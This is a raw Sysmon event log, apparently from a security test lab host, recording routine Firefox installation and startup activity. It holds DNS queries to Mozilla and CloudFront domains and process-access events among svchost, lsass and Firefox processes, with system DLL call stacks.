13:59:57.543{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com013.224.194.126;13.224.194.17;13.224.194.21;13.224.194.35;C:\Program 
Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.542{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:13.224.194.35;::ffff:13.224.194.126;::ffff:13.224.194.17;::ffff:13.224.194.21;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.457{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:7400:a:da5e:7900:93a1;2600:9000:2057:b000:a:da5e:7900:93a1;2600:9000:2057:c000:a:da5e:7900:93a1;2600:9000:2057:ee00:a:da5e:7900:93a1;2600:9000:2057:0:a:da5e:7900:93a1;2600:9000:2057:3a00:a:da5e:7900:93a1;2600:9000:2057:6200:a:da5e:7900:93a1;2600:9000:2057:6400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.456{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net054.230.183.110;54.230.183.119;54.230.183.6;54.230.183.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.455{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:54.230.183.34;::ffff:54.230.183.110;::ffff:54.230.183.119;::ffff:54.230.183.6;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.419{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.418{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com013.224.194.20;13.224.194.89;13.224.194.121;13.224.194.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.411{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:13.224.194.19;::ffff:13.224.194.20;::ffff:13.224.194.89;::ffff:13.224.194.121;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.635{59A5CD1D-944E-6005-2205-00000000A301}6120download-stats.mozilla.org0type: 5 download-stats.r53-2.services.mozilla.com;::ffff:34.215.48.141;::ffff:52.40.50.138;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 10341000x800000000000000017027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.677{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla 
Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.548{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.538{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.538{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.520{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program 
Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla 
